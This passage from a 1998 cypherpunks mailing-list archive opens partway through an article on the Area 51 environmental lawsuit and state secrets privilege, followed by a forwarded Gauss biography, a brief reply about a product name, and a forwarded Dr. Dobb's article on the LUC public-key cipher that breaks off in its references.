    about the facility, and a spokesman
    will read from a script: "There is an
    operating location in the vicinity of
    Groom Dry Lake. Some specific
    activities conducted on the Nellis
    Range both past and present remain
    classified and can't be discussed."
    
    In court, the Air Force tactics
    have been just as convoluted. In the early
    days of the lawsuit, argued before
    U.S. District Court Judge Phillip M.
    Pro, much of the contention centered
    on the Air Force's refusal to name the
    place at issue. The plaintiffs have all
    sworn that they worked at a facility
    called "Area 51," and Turley has
    introduced evidence, such as his
    clients' employee-evaluation forms
    and various government documents,
    that refer to the site as "Area 51." Air
    Force lawyers, however, have said
    that naming the base would
    undermine national security, because
    enemy powers could make valuable
    inferences from any verified names.
    
    In response, the plaintiffs
    accused the Air Force of cynically
    invoking national security in order to
    wriggle out from under the evidence
    that illegal practices were going on at
    a place called "Area 51." After all,
    Turley argued in court, "If the
    defendants confirmed 'Area 51' is
    often used to identify this facility, a
    foreign power would be no more
    educated as to [the facility's] operations than
    their previous knowledge, derived in
    no small part by the defendants' own
    public statements."
    
    But the name of the facility was
    only the first of a barrage of secrecy
    arguments the plaintiffs have faced.
    Throughout pretrial proceedings, Air
    Force lawyers repeatedly invoked the
    military and state secrets privilege, a
    rarely used tenet of common law that
    allows the executive branch to
    withhold information from trial if its
    disclosure might jeopardize U.S.
    soldiers or diplomatic relations. To
    support the claim, Air Force
    Secretary Sheila Widnall submitted
    two afffidavits, one public and one
    for the judge's eyes only, in which
    she argued that any environmental
    review of the facility entered into the
    record could educate foreign powers
    about U.S. military technology.
    "Collection of information regarding
    air, water, and soil is a classic foreign
    intelligence practice because
    analysis of these samples can result
    in the identification of military
    operations and capabilities," Widnall
    wrote.
    
    Turley-- himself a former staff
    member of the National Security
    Agency-- believes that the Air Force
    is improperly using the military
    secrets privilege to hamstring his
    case. Most of the chemicals burned
    at Area 51, he says, were standard
    solvents, paints, and the Like that are
    found at any aircraft production
    facility. If sensitive data did emerge,
    such as traces of the chemicals used
    in the radar-blunting coat of the
    Stealth fighter, they could simply be
    stricken from the record.
    
    Whatever the case, so far the
    tactics of the Air Force have largely
    prevailed. True, the plaintiffs have
    changed the course of environmental
    policy at the base; because of their
    suit, the Justice Department has
    launched a criminal investigation
    into the charges on EPA's behalf,
    and EPA has conducted the first
    hazardous waste inventory of Area
    51.
    
    But that inventory remains off
    limits to the plaintiffs, even though
    RCRA requires EPA to make such
    documents public because Judge Pro
    ruled that the president could grant a
    special exemption for national
    security reasons. RCRA has always
    allowed a president to create this kind
    of exemption; what is unusual about
    this case is that the judge allowed a
    president to do so after allegations of
    environmental crime had already
    emerged. And the exemption was
    duly granted: late in 1995, President
    Clinton signed an executive order
    exempting Area 51 "from any Federal,
    State, interstate or local provision
    respecting ... hazardous waste
    disposal that would require the
    disclosure of classified information 
    ... to any unauthorized person."
    
    In the wake of the president's
    intervention, in the spring of 1996
    Judge Pro dismissed the main case
    against the Pentagon on national
    security grounds. Turley has
    appealed the ruling to the Ninth
    Circuit Court of Appeals. To date,
    the court has not issued a ruling.
    
    In some senses, the lawsuit is
    unique: there is only one Area 51.
    The military has dozens of other
    restricted bases where highly secret
    weapons tests are carried out-- but,
    to the best of any civilian's
    knowledge, all of these sites are
    already listed on EPA's dockets.
    Environmental information about
    standard military bases is freely
    available. In general, says NRDC
    nuclear arms expert Stan Norris, the
    Air Force's behavior in the Area 51
    case is "not representative of the
    Department of Defense. They're not
    naturally secretive in [the
    environmental] area." Compared to
    the environmental traditions of the
    Department of Energy-- which
    opened up information on its nuclear
    weapons production sites only after
    years of public pressure and
    lawsuits-- when it comes to the
    Department, Norris says, 
    "We're awash in information."

    But Turley and other students of
    military secrecy believe that at issue
    in the Area 51 case is a bedrock
    principle. "In the end, this case can
    be boiled down to one question,"
    says Turley  "Can the Department of
    Defense create secret enclaves that
    are essentially removed from all
    civilian laws and responsibilities?"
    
    Borrowed from English common
    law, the military and state secrets
    privilege is as old as the nation itself.
    Ever since Aaron Burr stood trial for
    treason in 1807, the executive branch
    has, from time to time, sought to
    block information in civil and criminal
    trials. In Burr's case, the government
    refused to release letters written by
    one of Thomas Jefferson's generals.
    The defendant swore the
    letters would clear his name, but
    federal lawyers argued that the
    private notes "might contain state
    secrets, which could not be divulged
    without endangering the national
    safety."
    
    The secrecy powers were used
    most heavily during the Cold War,
    when military and intelligence
    agencies sought to hide technology
    from the Soviets and protect
    eavesdropping methods used
    against civilian activists. The
    Dreamland litigation, however, marks
    the first time the military and state
    secrets privilege has been invoked in
    a civil suit over toxic waste. It
    represents a fundamental clash
    between the demands of national
    security, in which stealth is an asset,
    and the right of public scrutiny that
    is at the core of U.S. environmental
    laws.
    
    National security and
    environmental law scholars take a
    keen interest in the case. "It seems to
    me that specific details of weapons
    programs can properly be held
    secret," comments Kate Martin,
    director of the Center for National
    Security Studies, which litigated
    some of the key state secrets cases
    of the 1980s. "The question is, is
    secrecy being used as a way of 
    of avoiding accountability,
    compliance with environmental law,
    or worker-safety standards?"
    
    Others see such speculation as
    both paranoid and naive. "Just
    because the Soviet Union is no
    longer around doesn't mean we don't
    need to keep secrets," says Kathleen
    Buck, former Pentagon general
    counsel for President Reagan. She
    argues that, since President Clinton's
    defense review revealed continued
    threats of ballistic missile attack,
    nuclear proliferation, rogue states,
    and terrorist cells, secrecy is a
    strategic advantage the United States
    still needs.
    
    "But we have to make sure that in
    building up the national defense, we
    don't destroy the very thing we're
    trying to protect," objects Steve
    Dycus, professor of national security
    and environmental law at Vermont
    Law School. A victory for the Pentagon
    over Area 51, he believes, could
    frustrate EPA's efforts to enforce
    environmental laws at sensitive
    military sites-- and the Pentagon,
    with more than a hundred active
    Superfund sites, is considered by
    many to be among America's worst
    polluters. Moreover, a military
    victory could have a chilling effect
    on other military employees who find
    themselves considering the difficult
    act of whistleblowing. After all,
    Dycus notes, RCRA is designed in
    part to enlist the help of citizens and
    states in enforcing environmental
    protection.
    
    While scholars debate policy, the
    employees of Area 51 wait for justice.
    The Air Force denies the charge of
    illegal burning, and Judge Pro
    dismissed the lawsuit without
    deciding on its substantive charges;
    so the plaintiffs have no answers to
    their questions about the painful skin
    disorders they say they suffer from.
    And, unless their appeal to the Ninth
    Circuit is granted, President Clinton's
    exemption precludes them from
    obtaining any information about
    what they might have been exposed
    to.
    
    Ironically, that exemption was
    made public the same day Clinton
    announced that the government
    would compensate victims of nuclear
    radiation experiments. "Our
    greatness is measured not only in
    how we so frequently do right," he
    said, "but also how we act when we
    have done the wrong thing."
    
    Has the United States done the
    wrong thing at Area 51? Without
    some kind of break in the intense
    secrecy that surrounds the place, the
    public has no way of knowing. To
    Glenn Campbell, who has made it his
    life's work to inform Americans about
    Area 51, the existence of this level of
    concealment-- and the lack of
    accountability that comes with it--
    are cause for suspicion. "The military
    is the only governmental branch that
    has the prerogative to keep things
    secret from the public," he says.
    "The problem is, where there's
    excessive secrecy, there's usually
    abuse."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 09:05:03 +0800
To: cypherpunks@ssz.com
Subject: Gauss.html
Message-ID: <199801110130.TAA15141@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



                          JOHANN CARL FRIEDRICH GAUSS
                                       
   
     _________________________________________________________________
   
  Born: 30 April 1777 in Brunswick, Duchy of Brunswick (now Germany)
  Died: 23 Feb 1855 in Gttingen, Hanover (now Germany)
  
   [LINK] 
   
   Show birthplace location
   
   Previous (Chronologically) Next Biographies Index
   Previous (Alphabetically) Next Welcome page
     _________________________________________________________________
   
     Carl Friedrich Gauss worked in a wide variety of fields in both
     mathematics and physics incuding number theory, analysis,
     differential geometry, geodesy, magnetism, astronomy and optics. His
     work has had an immense influence in many areas.
     
   At the age of seven, Carl Friedrich started elementary school, and his
   potential was noticed almost immediately. His teacher, Bttner, and
   his assistant, Martin Bartels, were amazed when Gauss summed the
   integers from 1 to 100 instantly by spotting that the sum was 50 pairs
   of numbers each pair summing to 101.
   
   In 1788 Gauss began his education at the Gymnasium with the help of
   Bttner and Bartels, where he learnt High German and Latin. After
   receiving a stipend from the Duke of Brunswick- Wolfenbttel, Gauss
   entered Brunswick Collegium Carolinum in 1792. At the academy Gauss
   independently discovered Bode's law, the binomial theorem and the
   arithmetic- geometric mean, as well as the law of quadratic
   reciprocity and the prime number theorem.
   
   In 1795 Gauss left Brunswick to study at Gttingen University. Gauss's
   teacher there was Kaestner, whom Gauss often ridiculed. His only known
   friend amongst the students was Farkas Bolyai. They met in 1799 and
   corresponded with each other for many years.
   
   Gauss left Gttingen in 1798 without a diploma, but by this time he
   had made one of his most important discoveries - the construction of a
   regular 17-gon by ruler and compasses This was the most major advance
   in this field since the time of Greek mathematics and was published as
   Section VII of Gauss's famous work, Disquisitiones Arithmeticae .
   
   Gauss returned to Brunswick where he received a degree in 1799. After
   the Duke of Brunswick had agreed to continue Gauss's stipend, he
   requested that Gauss submit a doctoral dissertation to the University
   of Helmstedt. He already knew Pfaff, who was chosen to be his advisor.
   Gauss's dissertation was a discussion of the fundamental theorem of
   algebra.
   
   With his stipend to support him, Gauss did not need to find a job so
   devoted himself to research. He published the book Disquisitiones
   Arithmeticae in the summer of 1801. There were seven sections, all but
   the last section, referred to above, being devoted to number theory.
   
   In June 1801, Zach, an astronomer whom Gauss had come to know two or
   three years previously, published the orbital positions of Ceres, a
   new "small planet" which was discovered by G Piazzi, an Italian
   astronomer on 1 January, 1801. Unfortunately, Piazzi had only been
   able to observe 9 degrees of its orbit before it disappeared behind
   the Sun. Zach published several predictions of its position, including
   one by Gauss which differed greatly from the others. When Ceres was
   rediscovered by Zach on 7 December 1801 it was almost exactly where
   Gauss had predicted. Although he did not disclose his methods at the
   time, Gauss had used his least squares approximation method.
   
   In June 1802 Gauss visited Olbers who had discovered Pallas in March
   of that year and Gauss investigated its orbit. Olbers requested that
   Gauss be made director of the proposed new observatory in Gttingen,
   but no action was taken. Gauss began corresponding with Bessel, whom
   he did not meet until 1825, and with Sophie Germain.
   
   Gauss married Johanna Ostoff on 9 October, 1805. Despite having a
   happy personal life for the first time, his benefactor, the Duke of
   Brunswick, was killed fighting for the Prussian army. In 1807 Gauss
   left Brunswick to take up the position of director of the Gttingen
   observatory.
   
   Gauss arrived in Gttingen in late 1807. In 1808 his father died, and
   a year later Gauss's wife Johanna died after giving birth to their
   second son, who was to die soon after her. Gauss was shattered and
   wrote to Olbers asking him give him a home for a few weeks,
   
     to gather new strength in the arms of your friendship - strength for
     a life which is only valuable because it belongs to my three small
     children.
     
   Gauss was married for a second time the next year, to Minna the best
   friend of Johanna, and although they had three children, this marriage
   seemed to be one of convenience for Gauss.
   
   Gauss's work never seemed to suffer from his personal tragedy. He
   published his second book, Theoria motus corporum coelestium in
   sectionibus conicis Solem ambientium, in 1809, a major two volume
   treatise on the motion of celestial bodies. In the first volume he
   discussed differential equations, conic sections and elliptic orbits,
   while in the second volume, the main part of the work, he showed how
   to estimate and then to refine the estimation of a planet's orbit.
   Gauss's contributions to theoretical astronomy stopped after 1817,
   although he went on making observations until the age of 70.
   
   Much of Gauss's time was spent on a new observatory, completed in
   1816, but he still found the time to work on other subjects. His
   publications during this time include Disquisitiones generales circa
   seriem infinitam , a rigorous treatment of series and an introduction
   of the hypergeometric function, Methodus nova integralium valores per
   approximationem inveniendi , a practical essay on approximate
   integration, Bestimmung der Genauigkeit der Beobachtungen , a
   discussion of statistical estimators, and Theoria attractionis
   corporum sphaeroidicorum ellipticorum homogeneorum methodus nova
   tractata . The latter work was inspired by geodesic problems and was
   principally concerned with potential theory. In fact, Gauss found
   himself more and more interested in geodesy in the 1820's.
   
   Gauss had been asked in 1818 to carry out a geodesic survey of the
   state of Hanover to link up with the existing Danish grid. Gauss was
   pleased to accept and took personal charge of the survey, making
   measurements during the day and reducing them at night, using his
   extraordinary mental capacity for calculations. He regularly wrote to
   Schumacher, Olbers and Bessel, reporting on his progress and
   discussing problems.
   
   Because of the survey, Gauss invented the heliotrope which worked by
   reflecting the Sun's rays using a design of mirrors and a small
   telescope. However, inaccurate base lines were used for the survey and
   an unsatisfactory network of triangles. Gauss often wondered if he
   would have been better advised to have pursued some other occupation
   but he published over 70 papers between 1820 and 1830.
   
   In 1822 Gauss won the Copenhagen University Prize with Theoria
   attractionis... together with the idea of mapping one surface onto
   another so that the two are similar in their smallest parts . This
   paper was published in 1825 and led to the much later publication of
   Untersuchungen ber Gegenstnde der Hheren Geodsie (1843 and 1846).
   The paper Theoria combinationis observationum erroribus minimis
   obnoxiae (1823), with its supplement (1828), was devoted to
   mathematical statistics, in particular to the least squares method.
   
   From the early 1800's Gauss had an interest in the question of the
   possible existence of a non-Euclidean geometry. He discussed this
   topic at length with Farkas Bolyai and in his correspondence with
   Gerling and Schumacher. In a book review in 1816 he discussed proofs
   which deduced the axiom of parallels from the other Euclidean axioms,
   suggesting that he believed in the existence of non-Euclidean
   geometry, although he was rather vague. Gauss confided in Schumacher,
   telling him that he believed his reputation would suffer if he
   admitted in public that he believed in the existence of such a
   geometry.
   
   In 1831 Farkas Bolyai sent to Gauss his son Jnos Bolyai's work on the
   subject. Gauss replied
   
     to praise it would mean to praise myself .
     
   Again, a decade later, when he was informed of Lobachevsky's work on
   the subject, he praised its "genuinely geometric" character, while in
   a letter to Schumacher in 1846, states that he
   
     had the same convictions for 54 years
     
   indicating that he had known of the existence of a non-Euclidean
   geometry since he was 15 years of age (this seems unlikely).
   
   Gauss had a major interest in differential geometry, and published
   many papers on the subject. Disquisitiones generales circa superficies
   curva (1828) was his most renowned work in this field. In fact, this
   paper rose from his geodesic interests, but it contained such
   geometrical ideas as Gaussian curvature. The paper also includes
   Gauss's famous theorema egregrium:
   
     If an area in E ^3 can be developed (i.e. mapped isometrically) into
     another area of E ^3 , the values of the Gaussian curvatures are
     identical in corresponding points.
     
   The period 1817-1832 was a particularly distressing time for Gauss. He
   took in his sick mother in 1817, who stayed until her death in 1839,
   while he was arguing with his wife and her family about whether they
   should go to Berlin. He had been offered a position at Berlin
   University and Minna and her family were keen to move there. Gauss,
   however, never liked change and decided to stay in Gttingen. In 1831
   Gauss's second wife died after a long illness.
   
   In 1831, Wilhelm Weber arrived in Gttingen as physics professor
   filling Tobias Mayer's chair. Gauss had known Weber since 1828 and
   supported his appointment. Gauss had worked on physics before 1831,
   publishing Uber ein neues allgemeines Grundgesetz der Mechanik , which
   contained the principle of least constraint, and Principia generalia
   theoriae figurae fluidorum in statu aequilibrii which discussed forces
   of attraction. These papers were based on Gauss's potential theory,
   which proved of great importance in his work on physics. He later came
   to believe his potential theory and his method of least squares
   provided vital links between science and nature.
   
   In 1832, Gauss and Weber began investigating the theory of terrestrial
   magnetism after Alexander von Humboldt attempted to obtain Gauss's
   assistance in making a grid of magnetic observation points around the
   Earth. Gauss was excited by this prospect and by 1840 he had written
   three important papers on the subject: Intensitas vis magneticae
   terrestris ad mensuram absolutam revocata (1832), Allgemeine Theorie
   des Erdmagnetismus (1839) and Allgemeine Lehrstze in Beziehung auf
   die im verkehrten Verhltnisse des Quadrats der Entfernung wirkenden
   Anziehungs- und Abstossungskrfte (1840). These papers all dealt with
   the current theories on terrestrial magnetism, including Poisson's
   ideas, absolute measure for magnetic force and an empirical definition
   of terrestrial magnetism. Dirichlet's principal was mentioned without
   proof.
   
   Allgemeine Theorie... showed that there can only be two poles in the
   globe and went on to prove an important theorem, which concerned the
   determination of the intensity of the horizontal component of the
   magnetic force along with the angle of inclination. Gauss used the
   Laplace equation to aid him with his calculations, and ended up
   specifying a location for the magnetic South pole.
   
   Humboldt had devised a calendar for observations of magnetic
   declination. However, once Gauss's new magnetic observatory (completed
   in 1833 - free of all magnetic metals) had been built, he proceeded to
   alter many of Humboldt's procedures, not pleasing Humboldt greatly.
   However, Gauss's changes obtained more accurate results with less
   effort.
   
   Gauss and Weber achieved much in their six years together. They
   discovered Kirchhoff's laws, as well as building a primitive telegraph
   device which could send messages over a distance of 5000 ft. However,
   this was just an enjoyable pastime for Gauss. He was more interested
   in the task of establishing a world-wide net of magnetic observation
   points. This occupation produced many concrete results. The
   Magnetischer Verein and its journal were founded, and the atlas of
   geomagnetism was published, while Gauss and Weber's own journal in
   which their results were published ran from 1836 to 1841.
   
   In 1837, Weber was forced to leave Gttingen when he became involved
   in a political dispute and, from this time, Gauss's activity gradually
   decreased. He still produced letters in response to fellow scientists'
   discoveries usually remarking that he had known the methods for years
   but had never felt the need to publish. Sometimes he seemed extremely
   pleased with advances made by other mathematicians, particularly that
   of Eisenstein and of Lobachevsky.
   
   Gauss spent the years from 1845 to 1851 updating the Gttingen
   University widow's fund. This work gave him practical experience in
   financial matters, and he went on to make his fortune through shrewd
   investments in bonds issued by private companies.
   
   Two of Gauss's last doctoral students were Moritz Cantor and Dedekind.
   Dedekind wrote a fine description of his supervisor
   
     ... usually he sat in a comfortable attitude, looking down, slightly
     stooped, with hands folded above his lap. He spoke quite freely,
     very clearly, simply and plainly: but when he wanted to emphasise a
     new viewpoint ... then he lifted his head, turned to one of those
     sitting next to him, and gazed at him with his beautiful,
     penetrating blue eyes during the emphatic speech. ... If he
     proceeded from an explanation of principles to the development of
     mathematical formulas, then he got up, and in a stately very upright
     posture he wrote on a blackboard beside him in his peculiarly
     beautiful handwriting: he always succeeded through economy and
     deliberate arrangement in making do with a rather small space. For
     numerical examples, on whose careful completion he placed special
     value, he brought along the requisite data on little slips of paper.
     
   Gauss presented his golden jubilee lecture in 1849, fifty years after
   his diploma had been granted by Hemstedt University. It was
   appropriately a variation on his dissertation of 1799. From the
   mathematical community only Jacobi and Dirichlet were present, but
   Gauss received many messages and honours.
   
   From 1850 onwards Gauss's work was again of nearly all of a practical
   nature although he did approve Riemann's doctoral thesis and heard his
   probationary lecture. His last known scientific exchange was with
   Gerling. He discussed a modified Foucalt pendulum in 1854. He was also
   able to attend the opening of the new railway link between Hanover and
   Gttingen, but this proved to be his last outing. His health
   deteriorated slowly, and Gauss died in his sleep early in the morning
   of 23 February, 1855.
   
   References (67 books/articles)
   
   Some pages from works by Gauss:
   
   A letter from Gauss to Taurinus discussing the possibility of
   non-Euclidean geometry.
   An extract from Theoria residuorum biquadraticorum 
   (1828-32)
   
   References elsewhere in this archive:
   
   You can see another picture of Gauss in 1803.
   
   Tell me about the Prime Number Theorem
   
   Show me Gauss's estimate for the density of primes and compare it with
   Legendre's
   
   Tell me about Gauss's part in investigating prime numbers
   
   Tell me about Gauss's part in the development of group theory and
   matrices and determinants
   
   Tell me about his work on non-Euclidean geometry and topology
   
   Tell me about Gauss's work on the fundamental theorem of algebra
   
   Tell me about his work on orbits and gravitation
   
   Other Web sites:
   
   You can find out about the Prime Number Theorem at University of
   Tennessee, USA
   
   
   
   
     _________________________________________________________________
   
   Previous (Chronologically) Next Biographies Index
   Previous (Alphabetically) Next Welcome page
   History Topics Index Famous curves index
   Chronologies Birthplace Maps
   Mathematicians of the day Anniversaries for the year
   Search Form Simple Search Form Search Suggestions
     _________________________________________________________________
   
   JOC/EFR December 1996





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 11 Jan 1998 11:48:14 +0800
To: "James A. Donald" <cypherpunks@cyberpass.net
Subject: Re: The name "Crypto Kong"
In-Reply-To: <199801101918.LAA06148@proxy4.ba.best.com>
Message-ID: <3.0.5.32.19980110194009.00883460@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:18 AM 1/10/98 -0800, James A. Donald wrote:
>I have received some negative feedback about the name 
>"Crypto Kong".
>Two people have complained that it is unprofessional sounding. 

Keep it.  If you're going for the liberal non-techie market, it's good;
if you're going for the financial market it's still ok,
and if you need to, you can publish a standard for it,
and some small Nevada corporation with a boring name can distribute a 
Crypto-Kong-compatible product with a boring name for you :-)

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 09:26:35 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: LUC Public Key Crypto...
Message-ID: <199801110150.TAA15260@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

In the process of doing some research on Gauss I stumbled across this...


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|


Forwarded message:

>    Dr. Dobb's Web Site
>    
>                           LUC PUBLIC-KEY ENCRYPTION
>                                        
>    
>    
>    A secure alternative to RSA
>    
>    Peter Smith
>    
>    Peter has worked in the computer industry for 15 years as a
>    programmer, analyst, and consultant and has served as deputy editor of
>    Asian Computer Monthly. Peter's interest in number theory led to the
>    invention of LUC in 1991. He can be reached at 25 Lawrence Street,
>    Herne Bay, Auckland, New Zealand.
>    
>    
>      _________________________________________________________________
>    
>    According to former NSA director Bobby Innman, public-key cryptography
>    was discovered by the National Security Agency in the early seventies.
>    At the time, pundits remarked that public-key cryptography (PKC) was
>    like binary nerve gas--it was potent when two different substances
>    were brought together, but quite innocuous in its separate parts.
>    Because the NSA promptly classified it, not much was known about PKC
>    until the mid-seventies when Martin Hellman and Whitfield Diffie
>    independently came up with the notion and published papers about it.
>    
>    Traditional cryptographic systems like the venerable Data Encryption
>    Standard (DES) use the same key at both ends of a message
>    transmission. The problem of ensuring correct keys leads to such
>    expensive expedients as distributing the keys physically with trusted
>    couriers. Diffie and Hellman (and the NSA) had the idea of making the
>    keys different at each end. In addition to encryption, they envisioned
>    this scheme would also lead to a powerful means of source
>    authentication known as digital signatures.
>    
>    RSA, developed in 1977, was the first reliable method of source
>    authentication. The RSA approach (patented in the early eighties)
>    initiated intense research in "number theory," one of the most
>    recondite areas of mathematics. Although C.F. Gauss studied this topic
>    in the early 1800s (referring to it then as "higher arithmetic"), very
>    little real progress has been made in solving the problem of factoring
>    since then. The means available today are essentially no better than
>    exhaustive searching for prime factors. In terms of intractability
>    theory, however, no one has yet proved that the problem is
>    intractable, although researchers believe it to be so.
>    
>    
>    
> The RSA Algorithm
> 
>    
>    
>    RSA works by raising a message block to a very large power, then
>    reducing this modulo N, where N (the product of two large prime
>    numbers) is part of the key. Typical systems use an N of 512 bits, and
>    the exponent to which blocks are raised in decryption is of the same
>    order. An immediate problem in implementing such a system is the
>    representation and efficient manipulation of such large integers.
>    (Standard microprocessors don't really have the power to handle normal
>    integer sizes and functions; even numeric coprocessors are inadequate
>    when integers of this size are involved.)
>    
>    RSA has dominated public-key encryption for the last 15 years as
>    research has failed to turn up a reliable alternative--until the
>    advent of LUC. Based on the same difficult mathematical problem as
>    RSA, LUC uses the calculation of Lucas functions instead of
>    exponentiation. (See text box entitled, "How the Lucas Alternative
>    Works.")
>    
>    Because we're working in the area of mathematics, we can formally
>    prove that LUC is a true alternative to RSA. Furthermore, we can show
>    that a cipher based on LUC will be at least as efficient. More
>    importantly, we can show that LUC is a stronger cipher than RSA. The
>    reason is that under RSA, the digital signature of a product is the
>    product of the signatures making up the product; in mathematical
>    terms, M{e}L{e}=(ML){e}. This opens RSA to a cryptographic attack
>    known as adaptive chosen-message forgery. Ironically, this is outlined
>    in a paper co-authored by Ron Rivest (the "R" in RSA). LUC is not
>    multiplicative and therefore not susceptible to this attack. Using
>    Lucas functions, V[e](M,1)V[e](L,1) is not equal to V[e](ML,1). In
>    other words, the use of exponentiation leads to RSA being
>    multiplicative in this way, while LUC's use of Lucas functions avoids
>    this weakness.
>    
> Choosing the Algorithms
> 
>    
>    
>    Lucas functions have been studied mainly in relation to primality
>    testing, and it was to these sources we turned when researching
>    efficient algorithms for implementing LUC. For given parameters, the
>    Lucas functions give rise to two series, U[n] and V[n]. The first
>    algorithm (see Listing One, page 90) calculated both, even though we
>    were only interested in V[n]. It was only in a paper on factoring
>    integers that we found a means of calculating V[n] alone (see Listing
>    Two, page 90). The pseudocode examples show that both algorithms have
>    two phases: The work done when the current bit is a 0 is half the work
>    necessary when the current bit is a 1.
>    
>    More Details.
>    
>    Typically, in systems like LUC the exponent used for encryption is a
>    much smaller integer than that used for decryption. A commonly chosen
>    encryption exponent is the prime number 65,537. This is a good choice
>    for fast encryption as all but 2 of the 17 bits are 0s. We have no
>    such control over the decryption exponent, but there is a way of
>    halving the work, and thus, of introducing a limited degree of
>    parallelism into the calculation.
>    
>    Since LUC is a public-key cryptosystem, we can always assume that the
>    possessor of the private decrypting keys knows the two primes (p and
>    q) which make up the modulus, N. Consequently, we can reduce the
>    exponent and message with respect to the two primes, in each case at
>    least halving the amount of work. At the end of the calculation with
>    respect to the primes, we bring the results together to produce the
>    final plain text (see Listing Three, page 90).
>    
> Large-integer Arithmetic
> 
>    
>    
>    There's really only one source of information about large-integer
>    arithmetic: Knuth's The Art of Computer Programming. We found that
>    almost every time we referred to his book, we came up with some new
>    angle or way of tweaking some extra performance out of our code.
>    
>    We decided to represent the large integers as 256-byte arrays, with
>    the low byte giving the length (in bytes) of the integer. For
>    instance, the 8-byte hexadecimal number 1234567890ABCDEF would appear
>    in a file view as 08 EF CD AB 90 78 56 34 12. These arrays became a
>    Pascal-type har (for hexadecimal array). We can store integers of over
>    600 decimal digits in our hars, but because the hars must be able to
>    hold the results of a multiplication, we are limited to manipulating
>    integers up to 300 decimal digits in length.
>    
>    Implementation of addition, subtraction, and multiplication went quite
>    smoothly; implementation of division took more effort. (We took
>    comfort in not being the first to encounter problems with division.
>    Lady Ada Lovelace, the first computer programmer, said, "I am still
>    working at some most entangled notations of division, but see my way
>    through them at the expense of heavy labor, from which I shall not
>    shrink as long as my head can bear it.") We tried various methods,
>    including one based on Newton which calculated the inverse of the
>    divisor and then multiplied. (See Knuth's discussion.) We finally
>    opted for Knuth's Algorithm D, despite his warning that it contained
>    possible discontinuities. At that stage, we were working on a 16-bit
>    80286 PC; see Listing Four, page 90.
>    
>    Of course there was much more than the division routine to consider,
>    but we found that it was the critical routine in terms of getting LUC
>    to run at a reasonable speed. Once we had upgraded to an 80386, we
>    converted to a full 32-bit implementation. The assembler code for the
>    division (still Algorithm D) is given in Listing Five (page 91).
>    Although space constraints prevent a complete presentation of the
>    code, suffice to say that we have been able to achieve a
>    signing/decryption speed on a modulus of 512 bits of over 200 bits per
>    second (33-MHz 80386, 0 wait states).
>    
> Other Issues
> 
>    
>    
>    Central to any cryptographic system are keys. In LUC, if an adversary
>    is able to find p and q, the prime factors of modulus N, then all
>    messages sent with N can be either read in the case of encryption or
>    forged in the case of signing.
>    
>    Since the days of Gauss, research on factoring has come up with
>    various so-called "aleatoric" methods of factoring some numbers. These
>    methods are like cures for poison ivy: numerous, and occasionally
>    efficacious. One old method, found by Pierre Fermat, is very quick at
>    factoring some types of composite numbers. If N is the product of two
>    primes which are close together, then it can be easily factored. For
>    example, if p=1949, and q=1951, then N=3802499. Taking the square root
>    of N, we find that it is approximately 1949.999. Adding 1 to the
>    integral part of this (giving 1950), we square this, giving 3802500.
>    If we now subtract N from this square, we get a difference of 1, which
>    is the square of itself. This means that N has been expressed as the
>    difference of two squares. As we learned in high school, x{2}-y{2} =
>    (x-y)(x+y), and so we obtain the two factors.
>    
>    Fermat's method works whenever the ratio of the factors is close to an
>    integer. (Note that the ratio is close to 1 in the above discussion.)
>    This attack, as cryptographers call methods used to break a cipher,
>    has to be guarded against in generating the modulus N.
>    
>    Another guard is that neither (p + 1) and (q + 1) nor (p - 1) and (q -
>    1) should be made up of small prime factors. There are many other
>    guards of varying degrees of importance, but the entire area needs
>    consideration depending on the level of security required, and how
>    long the keys are meant to last.
>    
>    The basic idea behind LUC is that of providing an alternative to RSA
>    by substituting the calculation of Lucas functions for that of
>    exponentiation. While Lucas functions are somewhat more complex
>    mathematically than exponentiation, they produce superior ciphers.
>    
>    This substitution process can be done with systems other than the RSA.
>    Among these are the Hellman-Diffie-Merkle key exchange system (U.S.
>    Patent number 4,200,770), the El Gamal public-key cryptosystem, the El
>    Gamal digital signature, and the recently proposed Digital Signature
>    Standard (DSS), all of which use exponentiation.
>    
>    The nonmultiplicative aspect of Lucas functions carries over, allowing
>    us to produce alternatives to all these. In the case of the DSS, Lucas
>    functions allow us to dispense with the one-way hashing cited (but not
>    specified) in the draft standard.
>    
>    A New Zealand consortium has been set up to develop and license
>    systems based on LUC, which is protected by a provisional patent. For
>    more information, contact me or Horace R. Moore, 101 E. Bonita, Sierra
>    Madre, California 91024.
>    
> References
> 
>    
>    
>    Athanasiou, Tom. "Encryption Technology, Privacy, and National
>    Security." MIT Technology Review (August/September, 1986).
>    
>    Diffie, W. and M.E. Hellman. "New Directions in Cryptography." IEEE
>    Transactions on Information Theory (November, 1976).
>    
>    El Gamal, Taher. "A Public Key Cryptosystem and a Signature Scheme
>    Based on Discrete Logarithms." IEEE Transactions on Information Theory
>    (July, 1985).
>    
>    Gauss, C.F. "Disquisitiones Arithmeticae," Article 329.
>    
>    Goldwasser, S., S. Micali, and R. Rivest. "A Digital Signature Scheme
>    Secure Against Adaptive Chosen Message Attack." SIAM J. COMPUT (April,
>    1988).
>    
>    Kaliski, Burton S., Jr. "Multiple-precision Arithmetic in C." Dr.
>    Dobb's Journal (August, 1992).
>    
>    Knuth, D.E. The Art of Computer Programming: Volume II: Semi-Numerical
